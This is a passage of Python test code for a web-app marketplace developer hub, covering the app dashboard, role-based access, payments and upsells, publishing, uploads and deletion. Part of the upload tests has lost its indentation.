        assert not item.find('p.incomplete'), (
            'Unexpected message about incomplete add-on')
        eq_(doc('.status-link').length, 1)
        eq_(doc('.more-actions-popup').length, 0)

    def test_incomplete_app(self):
        app = self.get_app()
        app.update(status=amo.STATUS_NULL)
        self.make_mine()
        doc = pq(self.client.get(self.url).content)
        assert doc('.item[data-addonid=%s] p.incomplete' % app.id), (
            'Expected message about incompleted add-on')
        eq_(doc('.more-actions-popup').length, 0)

    def test_packaged_version(self):
        app = self.get_app()
        version = Version.objects.create(addon=app, version='1.23')
        app.update(_current_version=version, is_packaged=True)
        self.make_mine()
        doc = pq(self.client.get(self.url).content)
        eq_(doc('.item[data-addonid=%s] .item-current-version' % app.id
                ).text(),
            'Packaged App Version: 1.23')

    @mock.patch('mkt.webapps.tasks.update_cached_manifests')
    def test_pending_version(self, ucm):
        ucm.return_value = True
        app = self.get_app()
        self.make_mine()
        app.update(is_packaged=True)
        # A newer version than current shows up as pending.
        Version.objects.create(addon=app, version='1.24')
        doc = pq(self.client.get(self.url).content)
        eq_(doc('.item[data-addonid=%s] .item-latest-version' % app.id
                ).text(),
            'Pending Version: 1.24')

    def test_action_links(self):
        # With all relevant waffle switches on and a paid packaged app,
        # every action link should appear in this exact order.
        self.create_switch('iarc')
        self.create_switch('comm-dashboard')
        self.create_switch('view-transactions')
        app = self.get_app()
        app.update(public_stats=True, is_packaged=True,
                   premium_type=amo.ADDON_PREMIUM_INAPP)
        self.make_mine()
        doc = pq(self.client.get(self.url).content)
        expected = [
            ('Edit Listing', app.get_dev_url()),
            ('Add New Version', app.get_dev_url('versions')),
            ('Status & Versions', app.get_dev_url('versions')),
            ('Content Ratings', app.get_dev_url('ratings')),
            ('Compatibility & Payments', app.get_dev_url('payments')),
            ('In-App Payments', app.get_dev_url('in_app_config')),
            ('Team Members', app.get_dev_url('owner')),
            ('View Listing', app.get_url_path()),
            ('Messages', app.get_comm_thread_url()),
            ('Statistics', app.get_stats_url()),
            ('Transactions', urlparams(
                reverse('mkt.developers.transactions'), app=app.id)),
        ]
        amo.tests.check_links(expected, doc('a.action-link'), verify=False)
class TestAppDashboardSorting(AppHubTest):
    """Pagination and sort controls on the dashboard listing."""

    def setUp(self):
        super(TestAppDashboardSorting, self).setUp()
        self.my_apps = self.user.addons
        self.url = reverse('mkt.developers.apps')
        self.clone(3)

    def clone(self, num=3):
        # Give the user `num` additional apps.
        for x in xrange(num):
            app = amo.tests.addon_factory(type=amo.ADDON_WEBAPP)
            AddonUser.objects.create(addon=app, user=self.user)

    def test_pagination(self):
        doc = pq(self.client.get(self.url).content)('#dashboard')
        eq_(doc('.item').length, 4)
        eq_(doc('#sorter').length, 1)
        eq_(doc('.paginator').length, 0)
        self.clone(7)  # 4 + 7 = 11 (paginator appears for 11+ results)
        doc = pq(self.client.get(self.url).content)('#dashboard')
        eq_(doc('.item').length, 10)
        eq_(doc('#sorter').length, 1)
        eq_(doc('.paginator').length, 1)
        doc = pq(self.client.get(self.url, dict(page=2)).content)('#dashboard')
        eq_(doc('.item').length, 1)
        eq_(doc('#sorter').length, 1)
        eq_(doc('.paginator').length, 1)

    def _test_listing_sort(self, sort, key=None, reverse=True,
                           sel_class='opt'):
        # Request the listing sorted by `sort`, verify the selected sort
        # link, and (when `key` is given) the resulting object ordering.
        r = self.client.get(self.url, dict(sort=sort))
        eq_(r.status_code, 200)
        sel = pq(r.content)('#sorter ul > li.selected')
        eq_(sel.find('a').attr('class'), sel_class)
        eq_(r.context['sorting'], sort)
        a = list(r.context['addons'].object_list)
        if key:
            eq_(a, sorted(a, key=lambda x: getattr(x, key), reverse=reverse))
        return a

    def test_default_sort(self):
        # Missing or unknown sort parameters fall back to sorting by name.
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        eq_(r.context['sorting'], 'name')
        r = self.client.get(self.url, dict(name='xxx'))
        eq_(r.status_code, 200)
        eq_(r.context['sorting'], 'name')
        self._test_listing_sort('name', 'name', False)

    def test_newest_sort(self):
        self._test_listing_sort('created', 'created')
class TestDevRequired(AppHubTest):
    """Access control on developer-only pages by role and app status."""

    def setUp(self):
        self.webapp = Addon.objects.get(id=337141)
        self.get_url = self.webapp.get_dev_url('payments')
        self.post_url = self.webapp.get_dev_url('payments.disable')
        self.user = UserProfile.objects.get(username='31337')
        assert self.client.login(username=self.user.email, password='password')
        self.au = AddonUser.objects.get(user=self.user, addon=self.webapp)
        eq_(self.au.role, amo.AUTHOR_ROLE_OWNER)
        self.make_price()

    def test_anon(self):
        # Anonymous users are bounced to login with a return URL.
        self.client.logout()
        r = self.client.get(self.get_url, follow=True)
        login = reverse('users.login')
        self.assertRedirects(r, '%s?to=%s' % (login, self.get_url))

    def test_dev_get(self):
        eq_(self.client.get(self.get_url).status_code, 200)

    def test_dev_post(self):
        self.assertRedirects(self.client.post(self.post_url), self.get_url)

    def test_viewer_get(self):
        # Viewers may read...
        self.au.role = amo.AUTHOR_ROLE_VIEWER
        self.au.save()
        eq_(self.client.get(self.get_url).status_code, 200)

    def test_viewer_post(self):
        # ...but not write.
        self.au.role = amo.AUTHOR_ROLE_VIEWER
        self.au.save()
        eq_(self.client.post(self.get_url).status_code, 403)

    def test_disabled_post_dev(self):
        self.webapp.update(status=amo.STATUS_DISABLED)
        eq_(self.client.post(self.get_url).status_code, 403)

    def test_disabled_post_admin(self):
        # Admins can still act on disabled apps.
        self.webapp.update(status=amo.STATUS_DISABLED)
        assert self.client.login(username='[email protected]',
                                 password='password')
        self.assertRedirects(self.client.post(self.post_url), self.get_url)
# PremiumForm.clean is patched out so posts bypass form-level validation.
@mock.patch('mkt.developers.forms_payments.PremiumForm.clean',
            new=lambda x: x.cleaned_data)
class TestMarketplace(amo.tests.TestCase):
    """Payments page: switching price tiers and managing upsells."""
    fixtures = fixture('prices', 'webapp_337141')

    def setUp(self):
        self.create_flag('allow-b2g-paid-submission')
        self.addon = Addon.objects.get(id=337141)
        self.addon.update(status=amo.STATUS_NOMINATED,
                          highest_status=amo.STATUS_NOMINATED)
        self.url = self.addon.get_dev_url('payments')
        assert self.client.login(username='[email protected]',
                                 password='password')

    def get_price_regions(self, price):
        # Region ids where this price tier can actually be charged.
        return sorted(set([p['region'] for p in price.prices() if p['paid']]))

    def setup_premium(self):
        """Turn the fixture app into a premium app with an upsell candidate."""
        self.price = Price.objects.get(pk=1)
        self.price_two = Price.objects.get(pk=3)
        self.other_addon = Addon.objects.create(type=amo.ADDON_WEBAPP,
                                                premium_type=amo.ADDON_FREE)
        self.other_addon.update(status=amo.STATUS_PUBLIC)
        AddonUser.objects.create(addon=self.other_addon,
                                 user=self.addon.authors.all()[0])
        AddonPremium.objects.create(addon=self.addon, price_id=self.price.pk)
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        self.paid_regions = self.get_price_regions(self.price)
        self.paid_regions_two = self.get_price_regions(self.price_two)

    def get_data(self, **kw):
        # Baseline POST payload for the payments form; override via kwargs.
        data = {
            'form-TOTAL_FORMS': 0,
            'form-INITIAL_FORMS': 0,
            'form-MAX_NUM_FORMS': 0,
            'price': self.price.pk,
            'upsell_of': self.other_addon.pk,
            'regions': mkt.regions.REGION_IDS,
        }
        data.update(kw)
        return data

    def test_initial_free(self):
        AddonDeviceType.objects.create(
            addon=self.addon, device_type=amo.DEVICE_GAIA.id)
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        assert 'Change to Paid' in res.content

    def test_initial_paid(self):
        self.setup_premium()
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        eq_(res.context['form'].initial['price'], self.price.pk)
        assert 'Change to Free' in res.content

    def test_set(self):
        # Switching the price tier persists the new AddonPremium price.
        self.setup_premium()
        res = self.client.post(
            self.url, data=self.get_data(price=self.price_two.pk,
                                         regions=self.paid_regions_two))
        eq_(res.status_code, 302)
        self.addon = Addon.objects.get(pk=self.addon.pk)
        eq_(self.addon.addonpremium.price, self.price_two)

    def test_set_upsell(self):
        self.setup_premium()
        res = self.client.post(self.url,
                               data=self.get_data(regions=self.paid_regions))
        eq_(res.status_code, 302)
        eq_(len(self.addon._upsell_to.all()), 1)

    def test_remove_upsell(self):
        # Posting an empty upsell_of deletes the existing upsell link.
        self.setup_premium()
        upsell = AddonUpsell.objects.create(
            free=self.other_addon, premium=self.addon)
        eq_(self.addon._upsell_to.all()[0], upsell)
        self.client.post(self.url,
                         data=self.get_data(upsell_of='',
                                            regions=self.paid_regions))
        eq_(len(self.addon._upsell_to.all()), 0)

    def test_replace_upsell(self):
        self.setup_premium()
        # Make this add-on an upsell of some free add-on.
        upsell = AddonUpsell.objects.create(free=self.other_addon,
                                            premium=self.addon)
        # And this will become our new upsell, replacing the one above.
        new = Addon.objects.create(type=amo.ADDON_WEBAPP,
                                   premium_type=amo.ADDON_FREE,
                                   status=amo.STATUS_PUBLIC)
        AddonUser.objects.create(addon=new, user=self.addon.authors.all()[0])
        eq_(self.addon._upsell_to.all()[0], upsell)
        self.client.post(self.url, self.get_data(upsell_of=new.id,
                                                 regions=self.paid_regions))
        upsell = self.addon._upsell_to.all()
        eq_(len(upsell), 1)
        eq_(upsell[0].free, new)
class TestPublicise(amo.tests.TestCase):
    """Manually publishing an app that is in the public-waiting state."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        self.create_switch('iarc')
        self.webapp = self.get_webapp()
        self.webapp.update(status=amo.STATUS_PUBLIC_WAITING)
        self.file = self.webapp.versions.latest().all_files[0]
        self.file.update(status=amo.STATUS_PUBLIC_WAITING)
        self.publicise_url = self.webapp.get_dev_url('publicise')
        self.status_url = self.webapp.get_dev_url('versions')
        assert self.client.login(username='[email protected]',
                                 password='password')

    def get_webapp(self):
        # no_cache so status changes made by the view are always visible.
        return Addon.objects.no_cache().get(id=337141)

    def test_logout(self):
        # Logged-out POSTs redirect and leave the status unchanged.
        self.client.logout()
        res = self.client.post(self.publicise_url)
        eq_(res.status_code, 302)
        eq_(self.get_webapp().status, amo.STATUS_PUBLIC_WAITING)

    def test_publicise_get(self):
        # Publishing must be a POST; GET is not allowed.
        eq_(self.client.get(self.publicise_url).status_code, 405)

    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    @mock.patch('mkt.webapps.tasks.index_webapps')
    @mock.patch('mkt.webapps.tasks.update_cached_manifests')
    @mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
    @mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
    def test_publicise(self, update_name, update_locales,
                       update_cached_manifests, index_webapps,
                       storefront_mock):
        """Publishing flips app and file to public and fires the side tasks."""
        index_webapps.delay.reset_mock()
        eq_(update_name.call_count, 0)
        eq_(update_locales.call_count, 0)
        eq_(update_cached_manifests.delay.call_count, 0)
        eq_(storefront_mock.call_count, 0)
        eq_(self.get_webapp().status, amo.STATUS_PUBLIC_WAITING)
        res = self.client.post(self.publicise_url)
        eq_(res.status_code, 302)
        eq_(self.get_webapp().status, amo.STATUS_PUBLIC)
        eq_(self.get_webapp().versions.latest().all_files[0].status,
            amo.STATUS_PUBLIC)
        eq_(update_name.call_count, 1)
        eq_(update_locales.call_count, 1)
        eq_(index_webapps.delay.call_count, 1)
        # App is not packaged, no need to call update_cached_manifests.
        eq_(update_cached_manifests.delay.call_count, 0)
        eq_(storefront_mock.call_count, 1)

    def test_status(self):
        # The status page's publish form posts to the publicise endpoint.
        res = self.client.get(self.status_url)
        eq_(res.status_code, 200)
        doc = pq(res.content)
        eq_(doc('#version-status form').attr('action'), self.publicise_url)
        # TODO: fix this when jenkins can get the jinja helpers loaded in
        # the correct order.
        #eq_(len(doc('strong.status-waiting')), 1)
class TestPubliciseVersion(amo.tests.TestCase):
    """Publishing a single public-waiting version of a packaged app."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        Addon.objects.filter(pk=337141).update(is_packaged=True)
        self.app = self.get_webapp()
        self.url = self.app.get_dev_url('versions.publicise')
        self.status_url = self.app.get_dev_url('versions')
        assert self.client.login(username='[email protected]',
                                 password='password')

    def get_webapp(self):
        return Addon.objects.no_cache().get(pk=337141)

    def get_version_status(self):
        # Status of the latest version's file, bypassing the cache.
        v = Version.objects.no_cache().get(pk=self.app.latest_version.pk)
        return v.all_files[0].status

    def post(self, pk=None):
        # POST the publicise form for the given (default: latest) version.
        if not pk:
            pk = self.app.latest_version.pk
        return self.client.post(self.url, data={
            'version_id': pk
        })

    def test_logout(self):
        # Logged-out POSTs redirect and do not publish anything.
        File.objects.filter(version__addon=self.app).update(
            status=amo.STATUS_PUBLIC_WAITING)
        self.client.logout()
        res = self.post()
        eq_(res.status_code, 302)
        eq_(self.get_version_status(), amo.STATUS_PUBLIC_WAITING)

    def test_publicise_get(self):
        # Publishing must be a POST; GET is not allowed.
        eq_(self.client.get(self.url).status_code, 405)

    @mock.patch('mkt.webapps.tasks.index_webapps')
    @mock.patch('mkt.webapps.tasks.update_cached_manifests')
    @mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
    @mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
    def test_publicise_version_new_waiting(self, update_name, update_locales,
                                           update_cached_manifests,
                                           index_webapps):
        """ Test publishing the latest, public_waiting version when the app is
        already public, with a current version also already public """
        eq_(self.app.status, amo.STATUS_PUBLIC)
        ver = version_factory(addon=self.app, version='2.0',
                              file_kw=dict(status=amo.STATUS_PUBLIC_WAITING))
        eq_(self.app.latest_version, ver)
        ok_(self.app.current_version != ver)
        index_webapps.delay.reset_mock()
        eq_(update_name.call_count, 0)
        eq_(update_locales.call_count, 0)
        eq_(update_cached_manifests.delay.call_count, 0)
        res = self.post()
        eq_(res.status_code, 302)
        eq_(self.get_version_status(), amo.STATUS_PUBLIC)
        eq_(self.get_webapp().current_version, ver)
        eq_(update_name.call_count, 1)
        eq_(update_locales.call_count, 1)
        eq_(update_cached_manifests.delay.call_count, 1)

    @mock.patch('mkt.webapps.tasks.index_webapps')
    @mock.patch('mkt.webapps.tasks.update_cached_manifests')
    @mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
    @mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
    def test_publicise_version_cur_waiting_app_public(self, update_name,
                                                      update_locales,
                                                      update_cached_manifests,
                                                      index_webapps):
        """ Test publishing when the app is in a weird state: public but with
        only one version, which is public_waiting """
        File.objects.filter(version__addon=self.app).update(
            status=amo.STATUS_PUBLIC_WAITING)
        eq_(self.app.current_version, self.app.latest_version)
        eq_(self.app.status, amo.STATUS_PUBLIC)
        index_webapps.delay.reset_mock()
        eq_(update_name.call_count, 0)
        eq_(update_locales.call_count, 0)
        eq_(update_cached_manifests.delay.call_count, 0)
        res = self.post()
        eq_(res.status_code, 302)
        eq_(self.app.current_version, self.app.latest_version)
        eq_(self.get_version_status(), amo.STATUS_PUBLIC)
        eq_(self.app.reload().status, amo.STATUS_PUBLIC)
        eq_(update_name.call_count, 1)
        eq_(update_locales.call_count, 1)
        # only one version, update_version() won't change it, the mini-manifest
        # doesn't need to be updated.
        eq_(update_cached_manifests.delay.call_count, 0)

    @mock.patch('mkt.webapps.tasks.index_webapps')
    @mock.patch('mkt.webapps.tasks.update_cached_manifests')
    @mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
    @mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
    def test_publicise_version_cur_waiting(self, update_name, update_locales,
                                           update_cached_manifests,
                                           index_webapps):
        """ Test publishing when the only version of the app is waiting """
        self.app.update(status=amo.STATUS_PUBLIC_WAITING)
        File.objects.filter(version__addon=self.app).update(
            status=amo.STATUS_PUBLIC_WAITING)
        eq_(self.app.current_version, self.app.latest_version)
        index_webapps.delay.reset_mock()
        eq_(update_name.call_count, 0)
        eq_(update_locales.call_count, 0)
        eq_(update_cached_manifests.delay.call_count, 0)
        res = self.post()
        eq_(res.status_code, 302)
        eq_(self.app.current_version, self.app.latest_version)
        eq_(self.get_version_status(), amo.STATUS_PUBLIC)
        eq_(self.app.reload().status, amo.STATUS_PUBLIC)
        eq_(update_name.call_count, 1)
        eq_(update_locales.call_count, 1)
        # only one version, update_version() won't change it, the mini-manifest
        # doesn't need to be updated.
        eq_(update_cached_manifests.delay.call_count, 0)

    @mock.patch('mkt.webapps.tasks.index_webapps')
    @mock.patch('mkt.webapps.tasks.update_cached_manifests')
    @mock.patch('mkt.webapps.models.Webapp.update_supported_locales')
    @mock.patch('mkt.webapps.models.Webapp.update_name_from_package_manifest')
    def test_publicise_version_pending(self, update_name, update_locales,
                                       update_cached_manifests, index_webapps):
        """ Test publishing a pending version """
        version_factory(addon=self.app, version='2.0',
                        file_kw=dict(status=amo.STATUS_PENDING))
        self.app.reload()
        res = self.post()
        eq_(res.status_code, 302)
        # A pending (not waiting) version must stay pending.
        eq_(self.get_version_status(), amo.STATUS_PENDING)
        assert not update_name.called
        assert not update_locales.called

    def test_status(self):
        # The version list's publish form posts to the publicise endpoint.
        File.objects.filter(version__addon=self.app).update(
            status=amo.STATUS_PUBLIC_WAITING)
        res = self.client.get(self.status_url)
        eq_(res.status_code, 200)
        doc = pq(res.content)
        eq_(doc('#version-list form').attr('action'), self.url)
class TestStatus(amo.tests.TestCase):
    """Status & Versions page: which actions are offered to devs vs admins."""
    fixtures = ['base/users'] + fixture('webapp_337141')

    def setUp(self):
        self.webapp = Addon.objects.get(id=337141)
        self.file = self.webapp.versions.latest().all_files[0]
        self.file.update(status=amo.STATUS_DISABLED)
        self.status_url = self.webapp.get_dev_url('versions')
        assert self.client.login(username='[email protected]',
                                 password='password')

    def _check_page(self, blocklist_shown):
        # Fetch the status page and assert which action buttons rendered.
        response = self.client.get(self.status_url)
        eq_(response.status_code, 200)
        doc = pq(response.content)
        eq_(doc('#disable-addon').length, 1)
        eq_(doc('#delete-addon').length, 1)
        eq_(doc('#blocklist-app').length, 1 if blocklist_shown else 0)

    def test_status_when_packaged_public_dev(self):
        self.webapp.update(is_packaged=True)
        self._check_page(blocklist_shown=False)

    def test_status_when_packaged_public_admin(self):
        # Only admins see the blocklist action on public packaged apps.
        assert self.client.login(username='[email protected]',
                                 password='password')
        self.webapp.update(is_packaged=True)
        self._check_page(blocklist_shown=True)

    def test_status_when_packaged_rejected_dev(self):
        self.webapp.update(is_packaged=True, status=amo.STATUS_REJECTED)
        self._check_page(blocklist_shown=False)

    def test_status_when_packaged_rejected_admin(self):
        # Rejected apps offer no blocklist action even to admins.
        assert self.client.login(username='[email protected]',
                                 password='password')
        self.webapp.update(is_packaged=True, status=amo.STATUS_REJECTED)
        self._check_page(blocklist_shown=False)
class TestDelete(amo.tests.TestCase):
    """Deleting an app from the developer hub."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        self.webapp = self.get_webapp()
        self.url = self.webapp.get_dev_url('delete')
        assert self.client.login(username='[email protected]',
                                 password='password')

    def get_webapp(self):
        # Bypass the cache so the deletion is observable immediately.
        return Addon.objects.no_cache().get(id=337141)

    def test_post(self):
        response = self.client.post(self.url, follow=True)
        eq_(pq(response.content)('.notification-box').text(), 'App deleted.')
        # The app must be gone afterwards.
        self.assertRaises(Addon.DoesNotExist, self.get_webapp)
class TestResumeStep(amo.tests.TestCase):
    """Resuming a partially-completed app submission flow."""
    fixtures = ['base/users'] + fixture('webapp_337141')

    def setUp(self):
        self.webapp = self.get_addon()
        self.url = reverse('submit.app.resume', args=[self.webapp.app_slug])
        assert self.client.login(username='[email protected]',
                                 password='password')

    def get_addon(self):
        return Addon.objects.no_cache().get(pk=337141)

    def test_no_step_redirect(self):
        # No checklist at all: resume goes straight to the edit page.
        r = self.client.get(self.url, follow=True)
        self.assertRedirects(r, self.webapp.get_dev_url('edit'), 302)

    def test_step_redirects(self):
        # Terms and manifest done: resume lands on the details step.
        AppSubmissionChecklist.objects.create(addon=self.webapp,
                                              terms=True, manifest=True)
        r = self.client.get(self.url, follow=True)
        self.assert3xx(r, reverse('submit.app.details',
                                  args=[self.webapp.app_slug]))

    def test_no_resume_when_done(self):
        # Fully completed checklist: the edit page is reachable directly.
        AppSubmissionChecklist.objects.create(addon=self.webapp,
                                              terms=True, manifest=True,
                                              details=True)
        r = self.client.get(self.webapp.get_dev_url('edit'), follow=True)
        eq_(r.status_code, 200)

    def test_resume_without_checklist(self):
        r = self.client.get(reverse('submit.app.details',
                                    args=[self.webapp.app_slug]))
        eq_(r.status_code, 200)
class TestUpload(BaseUploadTest):
fixtures = ['base/apps', 'base/users']
    def setUp(self):
        """Log in and point at the packaged-app upload endpoint."""
        super(TestUpload, self).setUp()
        assert self.client.login(username='[email protected]',
                                 password='password')
        self.package = self.packaged_app_path('mozball.zip')
        self.url = reverse('mkt.developers.upload')
def post(self):
# Has to be a binary, non xpi file.
data = open(self.package, 'rb')
return self.client.post(self.url, {'upload': data})
def test_login_required(self):
self.client.logout()
r = self.post()
eq_(r.status_code, 302)
def test_create_fileupload(self):
self.post()
upload = FileUpload.objects.get(name='mozball.zip')
eq_(upload.name, 'mozball.zip')
data = open(self.package, 'rb').read()
eq_(storage.open(upload.path).read(), data)
def test_fileupload_user(self):
self.client.login(username='[email protected]', password='password')
self.post()
user = UserProfile.objects.get(email='[email protected]')
eq_(FileUpload.objects.get().user, user)
def test_fileupload_ascii_post(self):
path = self.packaged_app_path('mozball.zip')
data = storage.open(os.path.join(settings.ROOT, path))
replaced = path.replace('o', u'ö')
r = self.client.post(self.url, {'upload':
SimpleUploadedFile(replaced,
data.read())})
# If this is broken, we'll get a traceback.
eq_(r.status_code, 302)
@mock.patch('mkt.constants.MAX_PACKAGED_APP_SIZE', 1024)
@mock.patch('mkt.developers.tasks.validator')
def test_fileupload_too_big(self, validator):
with tempfile.NamedTemporaryFile(delete=False) as tf:
name = tf.name
tf.write('x' * (MAX_PACKAGED_APP_SIZE + 1))
with open(name) as tf:
r = self.client.post(self.url, {'upload': tf})
os.unlink(name)
assert not validator.called, 'Validator erroneously invoked'
# Test that we get back a validation failure for the upload.
upload = FileUpload.objects.get()
r = self.client.get(reverse('mkt.developers.upload_detail',
args=[upload.uuid, 'json']))
eq_(r.status_code, 200)
data = json.loads(r.content)
assert 'validation' in data, data
assert 'success' in data['validation'], data
assert not data['validation']['success'], data['validation']
@attr('validator')
def test_fileupload_validation(self):
self.post()
fu = FileUpload.objects.get(name='mozball.zip')
assert_no_validation_errors(fu)
assert fu.validation
validation = json.loads(fu.validation)
eq_(validation['success'], False)
eq_(validation['errors'], 0)
def test_redirect(self):
r = self.post()
upload = FileUpload.objects.get()
url = reverse('mkt.developers.upload_detail', args=[upload.pk, 'json'])
self.assertRedirects(r, url)
class TestUploadDetail(BaseUploadTest):
    """Tests for the JSON and HTML upload-validation detail views.

    Fix: `test_detail_for_free_extension_webapp` contained a stray
    `yield response_mock` statement, which made the method a generator
    function — its body never actually ran as a test. The yield is
    removed so the assertions execute. The file opened in `post` is now
    also closed via a context manager.
    """
    fixtures = ['base/apps', 'base/appversion', 'base/platforms', 'base/users']

    def setUp(self):
        super(TestUploadDetail, self).setUp()
        assert self.client.login(username='[email protected]',
                                 password='password')

    def post(self):
        # Has to be a binary, non xpi file.
        with open(get_image_path('animated.png'), 'rb') as data:
            return self.client.post(reverse('mkt.developers.upload'),
                                    {'upload': data})

    def validation_ok(self):
        # Minimal "everything passed" validator result.
        return {
            'errors': 0,
            'success': True,
            'warnings': 0,
            'notices': 0,
            'message_tree': {},
            'messages': [],
            'rejected': False,
            'metadata': {}}

    def upload_file(self, name):
        with self.file(name) as f:
            r = self.client.post(reverse('mkt.developers.upload'),
                                 {'upload': f})
        eq_(r.status_code, 302)

    def file_content(self, name):
        with self.file(name) as fp:
            return fp.read()

    @contextmanager
    def file(self, name):
        # Open one of the bundled test add-on files.
        fn = os.path.join(settings.ROOT, 'mkt', 'developers', 'tests',
                          'addons', name)
        with open(fn, 'rb') as fp:
            yield fp

    @attr('validator')
    def test_detail_json(self):
        self.post()
        upload = FileUpload.objects.get()
        r = self.client.get(reverse('mkt.developers.upload_detail',
                                    args=[upload.uuid, 'json']))
        eq_(r.status_code, 200)
        data = json.loads(r.content)
        assert_no_validation_errors(data)
        eq_(data['url'],
            reverse('mkt.developers.upload_detail', args=[upload.uuid,
                                                          'json']))
        eq_(data['full_report_url'],
            reverse('mkt.developers.upload_detail', args=[upload.uuid]))
        # We must have tiers
        assert len(data['validation']['messages'])
        msg = data['validation']['messages'][0]
        eq_(msg['tier'], 1)

    @mock.patch('mkt.developers.tasks.requests.get')
    @mock.patch('mkt.developers.tasks.run_validator')
    def test_detail_for_free_extension_webapp(self, validator_mock,
                                              requests_mock):
        content = self.file_content('mozball.owa')
        response_mock = mock.Mock(status_code=200)
        response_mock.iter_content.return_value = mock.Mock(
            next=lambda: content)
        # `content_type` presumably comes from BaseUploadTest -- confirm.
        response_mock.headers = {'content-type': self.content_type}
        requests_mock.return_value = response_mock
        validator_mock.return_value = json.dumps(self.validation_ok())
        self.upload_file('mozball.owa')
        upload = FileUpload.objects.get()
        tasks.fetch_manifest('http://xx.com/manifest.owa', upload.pk)
        r = self.client.get(reverse('mkt.developers.upload_detail',
                                    args=[upload.uuid, 'json']))
        data = json.loads(r.content)
        eq_(data['validation']['messages'], [])  # no errors
        assert_no_validation_errors(data)  # no exception
        eq_(r.status_code, 200)
        eq_(data['url'],
            reverse('mkt.developers.upload_detail', args=[upload.uuid,
                                                          'json']))
        eq_(data['full_report_url'],
            reverse('mkt.developers.upload_detail', args=[upload.uuid]))

    def test_detail_view(self):
        self.post()
        upload = FileUpload.objects.get(name='animated.png')
        r = self.client.get(reverse('mkt.developers.upload_detail',
                                    args=[upload.uuid]))
        eq_(r.status_code, 200)
        doc = pq(r.content)
        eq_(doc('header h1').text(), 'Validation Results for animated.png')
        suite = doc('#addon-validator-suite')
        eq_(suite.attr('data-validateurl'),
            reverse('mkt.developers.standalone_upload_detail',
                    args=['hosted', upload.uuid]))
        eq_(suite('#suite-results-tier-2').length, 1)
def assert_json_error(request, field, msg):
    """Assert a 400 JSON response whose `field` error list is [`msg`].

    `field` of None means Django's non-field error key '__all__'.
    """
    eq_(request.status_code, 400)
    eq_(request['Content-Type'], 'application/json')
    if field is None:
        field = '__all__'
    content = json.loads(request.content)
    assert field in content, '%r not in %r' % (field, content)
    eq_(content[field], [msg])
def assert_json_field(request, field, msg):
    """Assert a 200 JSON response where `field` holds exactly `msg`."""
    eq_(request.status_code, 200)
    eq_(request['Content-Type'], 'application/json')
    content = json.loads(request.content)
    assert field in content, '%r not in %r' % (field, content)
    eq_(content[field], msg)
class TestDeleteApp(amo.tests.TestCase):
    """Deleting apps through the developer-hub delete endpoint."""
    fixtures = ['base/apps', 'base/users'] + fixture('webapp_337141')

    def setUp(self):
        self.webapp = Webapp.objects.get(id=337141)
        self.url = self.webapp.get_dev_url('delete')
        self.versions_url = self.webapp.get_dev_url('versions')
        self.dev_url = reverse('mkt.developers.apps')
        self.client.login(username='[email protected]', password='password')

    def test_delete_get(self):
        # Deletion is POST-only.
        eq_(self.client.get(self.url).status_code, 405)

    def test_delete_nonincomplete(self):
        res = self.client.post(self.url)
        self.assertRedirects(res, self.dev_url)
        eq_(Addon.objects.count(), 0, 'App should have been deleted.')

    def test_delete_incomplete(self):
        self.webapp.update(status=amo.STATUS_NULL)
        res = self.client.post(self.url)
        self.assertRedirects(res, self.dev_url)
        eq_(Addon.objects.count(), 0, 'App should have been deleted.')

    def test_delete_incomplete_manually(self):
        webapp = amo.tests.addon_factory(type=amo.ADDON_WEBAPP, name='Boop',
                                         status=amo.STATUS_NULL)
        eq_(list(Webapp.objects.filter(id=webapp.id)), [webapp])
        webapp.delete('POOF!')
        eq_(list(Webapp.objects.filter(id=webapp.id)), [],
            'App should have been deleted.')

    def check_delete_redirect(self, src, dst):
        # Delete with a ?to= redirect target and verify the destination.
        res = self.client.post(urlparams(self.url, to=src))
        self.assertRedirects(res, dst)
        eq_(Addon.objects.count(), 0, 'App should have been deleted.')

    def test_delete_redirect_to_dashboard(self):
        self.check_delete_redirect(self.dev_url, self.dev_url)

    def test_delete_redirect_to_dashboard_with_qs(self):
        url = self.dev_url + '?sort=created'
        self.check_delete_redirect(url, url)

    def test_form_action_on_status_page(self):
        # If we started on the app's Manage Status page, upon deletion we
        # should be redirected to the Dashboard.
        res = self.client.get(self.versions_url)
        eq_(pq(res.content)('.modal-delete form').attr('action'), self.url)
        self.check_delete_redirect('', self.dev_url)
class TestEnableDisable(amo.tests.TestCase):
    """Toggling an app's `disabled_by_user` flag via the dev URLs."""
    fixtures = fixture('webapp_337141', 'user_2519')

    def setUp(self):
        self.webapp = Webapp.objects.get(id=337141)
        self.enable_url = self.webapp.get_dev_url('enable')
        self.disable_url = self.webapp.get_dev_url('disable')
        assert self.client.login(username='[email protected]',
                                 password='password')

    def test_get(self):
        # Both endpoints are POST-only.
        for url in (self.enable_url, self.disable_url):
            eq_(self.client.get(url).status_code, 405)

    def test_not_allowed(self):
        self.client.logout()
        for url in (self.enable_url, self.disable_url):
            self.assertLoginRequired(self.client.get(url))

    def test_enable(self):
        self.webapp.update(disabled_by_user=True)
        self.client.post(self.enable_url)
        eq_(self.webapp.reload().disabled_by_user, False)

    def test_disable(self):
        self.client.post(self.disable_url)
        eq_(self.webapp.reload().disabled_by_user, True)
class TestRemoveLocale(amo.tests.TestCase):
    """POSTing to the remove-locale URL deletes one of an app's
    translations."""
    fixtures = ['base/users'] + fixture('webapp_337141')

    def setUp(self):
        self.webapp = Addon.objects.no_cache().get(id=337141)
        self.url = self.webapp.get_dev_url('remove-locale')
        assert self.client.login(username='[email protected]',
                                 password='password')

    def test_bad_request(self):
        # Missing 'locale' parameter.
        eq_(self.client.post(self.url).status_code, 400)

    def test_success(self):
        self.webapp.name = {'en-US': 'woo', 'es': 'ay', 'el': 'yeah'}
        self.webapp.save()
